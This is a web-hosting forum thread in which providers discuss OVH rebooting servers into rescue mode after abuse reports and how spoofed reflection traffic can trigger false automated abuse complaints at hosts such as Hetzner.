Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!


OVH will shut down your server if an abuse report is recieved.
New on LowEndTalk? Please Register and read our Community Rules.

All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.

OVH will shut down your server if an abuse report is recieved.

Jamie_DreamITJamie_DreamIT Member, Host Rep

I learned something new about OVH...

On Christmas Eve, one of our servers received an abuse report (typical for a hosting provider).

We typically action these reports within a couple of hours, but it seems now that OVH will immediately reboot your server into rescue mode once an abuse report is created.

I've never heard of any host performing this action other than suspending the network port.

I'm glad we're moving our services off their network.

Here's an extract from their support team:

The server will be rebooted into rescue mode if any abuse cases are reported. The abuse team will first reboot the server into rescue mode then email the customer to take necessary action to repair the server.

The abuse team will not request any permission from the customer to reboot the server into rescue mode if the server is reported for abuse cases.

TLDR: OVH will reboot your servers when they feel like it.

Comments

  • edited January 2023
  • NeoonNeoon Community Contributor, Veteran

    As far as I do understand this, your server was infected with malware or similar.
    I would have shoot it into the face too.

    OVH instead does put it into rescue.
    May be worth checking your costumer accounts for malware... and signs of intrusion before OVH acts.

  • @Neoon said:
    As far as I do understand this, your server was infected with malware or similar.
    I would have shoot it into the face too.

    OVH instead does put it into rescue.
    May be worth checking your costumer accounts for malware... and signs of intrusion before OVH acts.

    That's what support tells you when you got hit with amplified DDoS attack and someone sends an portscan abuse. I've had it happen quite a few times now, with different hosting providers.

  • NeoonNeoon Community Contributor, Veteran

    @treesmokah said:

    @Neoon said:
    As far as I do understand this, your server was infected with malware or similar.
    I would have shoot it into the face too.

    OVH instead does put it into rescue.
    May be worth checking your costumer accounts for malware... and signs of intrusion before OVH acts.

    That's what support tells you when you got hit with amplified DDoS attack and someone sends an portscan abuse. I've had it happen quite a few times now, with different hosting providers.

    What, no fucking way, makes no sense.
    Except, your service can actually be used for an amplification attack when ddosed.

  • treesmokahtreesmokah Member
    edited January 2023

    @Neoon said:

    @treesmokah said:

    @Neoon said:
    As far as I do understand this, your server was infected with malware or similar.
    I would have shoot it into the face too.

    OVH instead does put it into rescue.
    May be worth checking your costumer accounts for malware... and signs of intrusion before OVH acts.

    That's what support tells you when you got hit with amplified DDoS attack and someone sends an portscan abuse. I've had it happen quite a few times now, with different hosting providers.

    What, no fucking way, makes no sense.
    Except, your service can actually be used for an amplification attack when ddosed.

    "Amplified" nodes can complain, I've had it happen before.
    Some university in USA was hosting a shitty DNS service and complained that "I" portscanned their network or some shit.

    There quite a few DDoS attack methods that can result in server suspension for "abuse" on popular hosting providers. Its wild shit but yea, nothing we can really do as long as providers are clueless on attack vectors and treat "abuse" reports like a big thing.

    Thanked by 1kait
  • aquaaqua Member, Host Rep

    Yeah no.

    When I used OVH they at most nulled the IP. Never touched the server.

  • Isn't it common knowledge never to use OVH for production?

    Thanked by 1angelius
  • @aqua said:
    Yeah no.

    When I used OVH they at most nulled the IP. Never touched the server.

    Possibly a new policy, they did say it happened around Christmas.

  • e's an extract from their support team:

    The server will be rebooted into rescue mode if any abuse cases are reported. The abuse team will first reboot the server into rescue mode then email the customer to take necessary action to repair the server.

    The abuse team will not request any permission from the customer to reboot the server into rescue mode if the server is reported for abuse cases.

    TLDR: OVH will reboot your servers when they feel like it.

    Do they even check the report if it's true or not?
    "We have a new abuse case, make it into rescue mode and let's wait for the customer's reply."

  • They offer pretty good value outside of that

  • SwiftnodeSwiftnode Member, Host Rep, LIR
    edited January 2023

    @Neoon said:
    What, no fucking way, makes no sense.
    Except, your service can actually be used for an amplification attack when ddosed.

    It makes plenty of sense, we actually deal with this quite often from the dipshits @ Hetzner. They have an automated abuse system, all someone has to do is spoof your IPs, and Hetzner will automatically respond with a "portscan/flood" notice to your abuse contact.

    There was even one "stresser/booter" website that incorporated "abuse reports" as a DoS vector. They intentionally spoofed the victim IP toward Hetzner's network to generate multiple false positive abuse reports toward your ISP's abuse contacts, with the intent to have your ISP nullroute the victim address. (the website has since been seized by FBI)

    I tried to address this with Hetzner months ago, but I'm not sure it's possible to reach any qualified employee at their company, you just get the level 1 tech support who aren't qualified to use a crayon.

    I did a full write up on this here: https://lowendtalk.com/discussion/180973/prager-it-stefan-prager-absence-and-a-new-dos-vector-brought-to-you-by-hetzner

  • crunchbitscrunchbits Member, Patron Provider, Top Host

    @Swiftnode said:

    @Neoon said:
    What, no fucking way, makes no sense.
    Except, your service can actually be used for an amplification attack when ddosed.

    It makes plenty of sense, we actually deal with this quite often from the dipshits @ Hetzner. They have an automated abuse system, all someone has to do is spoof your IPs, and Hetzner will automatically respond with a "portscan/flood" notice to your abuse contact.

    There was even one "stresser/booter" website that incorporated "abuse reports" as a DoS vector. They intentionally spoofed the victim IP toward Hetzner's network to generate multiple false positive abuse reports toward your ISP's abuse contacts, with the intent to have your ISP nullroute the victim address. (the website has since been seized by FBI)

    I tried to address this with Hetzner months ago, but I'm not sure it's possible to reach any qualified employee at their company, you just get the level 1 tech support who aren't qualified to use a crayon.

    I did a full write up on this here: https://lowendtalk.com/discussion/180973/prager-it-stefan-prager-absence-and-a-new-dos-vector-brought-to-you-by-hetzner

    Just finished reading that. Pretty crazy situation, thanks for sharing and writing it up.

    Thanked by 1Swiftnode
  • Jamie_DreamITJamie_DreamIT Member, Host Rep

    @aqua said: When I used OVH they at most nulled the IP. Never touched the server.

    That's always been the case for us. I guess not anymore.

  • Decentralized internet, when?

    Thanked by 1op23
  • Virtual Server Will Be Rebooted

  • ..and how to clean/remove malware/infected files if ovh shuts down customer's server?

  • @JasonM said:
    ..and how to clean/remove malware/infected files if ovh shuts down customer's server?

    It is not shutdown. Only rebooted to rescue mode. Happened to me once long time ago without any warning or notification.

  • @JasonM said: Member

    Rescue mode can mount your server data and do the investigation into issue.

  • NeoonNeoon Community Contributor, Veteran

    @Swiftnode said:

    @Neoon said:
    What, no fucking way, makes no sense.
    Except, your service can actually be used for an amplification attack when ddosed.

    It makes plenty of sense, we actually deal with this quite often from the dipshits @ Hetzner. They have an automated abuse system, all someone has to do is spoof your IPs, and Hetzner will automatically respond with a "portscan/flood" notice to your abuse contact.

    There was even one "stresser/booter" website that incorporated "abuse reports" as a DoS vector. They intentionally spoofed the victim IP toward Hetzner's network to generate multiple false positive abuse reports toward your ISP's abuse contacts, with the intent to have your ISP nullroute the victim address. (the website has since been seized by FBI)

    I tried to address this with Hetzner months ago, but I'm not sure it's possible to reach any qualified employee at their company, you just get the level 1 tech support who aren't qualified to use a crayon.

    I did a full write up on this here: https://lowendtalk.com/discussion/180973/prager-it-stefan-prager-absence-and-a-new-dos-vector-brought-to-you-by-hetzner

    Okay but that is a logic error, if you code that, into your abuse detection.
    The IP comes from the outside but its within your network, that doesn't make sense, if the machine itself does not send any traffic that way.

  • SwiftnodeSwiftnode Member, Host Rep, LIR
    edited January 2023

    @Neoon said:
    Okay but that is a logic error, if you code that, into your abuse detection.
    The IP comes from the outside but its within your network, that doesn't make sense, if the machine itself does not send any traffic that way.

    I think you're misunderstanding what the original comment you replied to was saying. They were referencing reflection attacks, which is when an attacker spoofs the victim IP toward a service, to receive a amplified response toward the victim IP.

    So to loop back to my Hetzner example, spoof multiple IPs that belong to Hetzner's ASN toward a public facing UDP service, eg. DNS, NTP, SRCDS, etc, and those legitimate services will respond to Hetzner's IPs, which would result in them sending an automated abuse complaint to your ISP. (even though there's not much you can do to prevent these types of attacks, as your public facing UDP services believe they are responding to a legitimate request from the victim IPs.)

    This is super common with Valve/Source engine games.

  • jarjar Patron Provider, Top Host, Veteran

    Well that will do all of absolutely nothing to halt the real abuse in their network right now. The real abuse is coming from people spinning up cloud servers, spamming, deleting the server, and repeating. By the time the complaints roll in, that server is long gone. So if they're cracking down harder to tackle the real problems, this misses the mark completely.

    Thanked by 2webcraft dystopia
  • MaouniqueMaounique Host Rep, Veteran
    edited January 2023

    @jar said: So if they're cracking down harder to tackle the real problems, this misses the mark completely.

    Of course it does.
    Requesting ID, maybe I would send, but also MY picture holding it?

    That being said, I can understand automation in large providers as well as being gamed for a kind of "SWATing" type of DoS, i.e. force an automated abuse report in order to create an automated rescue mode.

    This can only be solved by having smarter people coding the automation and, better yet, any kind of people with half a brain to see those reports and act only in case they hold water.

    In many years this never happened to me, though.

  • NeoonNeoon Community Contributor, Veteran

    @Swiftnode said:

    @Neoon said:
    Okay but that is a logic error, if you code that, into your abuse detection.
    The IP comes from the outside but its within your network, that doesn't make sense, if the machine itself does not send any traffic that way.

    I think you're misunderstanding what the original comment you replied to was saying.

    I didn't read the whole post again.
    But still, they didn't seem to keep in mind, that the abuse system based on that, could be exploited.

  • Welcome to the world.

  • @Swiftnode said: So to loop back to my Hetzner example, spoof multiple IPs that belong to Hetzner's ASN toward a public facing UDP service, eg. DNS, NTP, SRCDS, etc, and those legitimate services will respond to Hetzner's IPs, which would result in them sending an automated abuse complaint to your ISP.

    You can't decide the source IP reliably with UDP. People should only report abuses on TCP which with 3-way handshaking effectively eliminates spoofed IP addresses.

Sign In or Register to comment.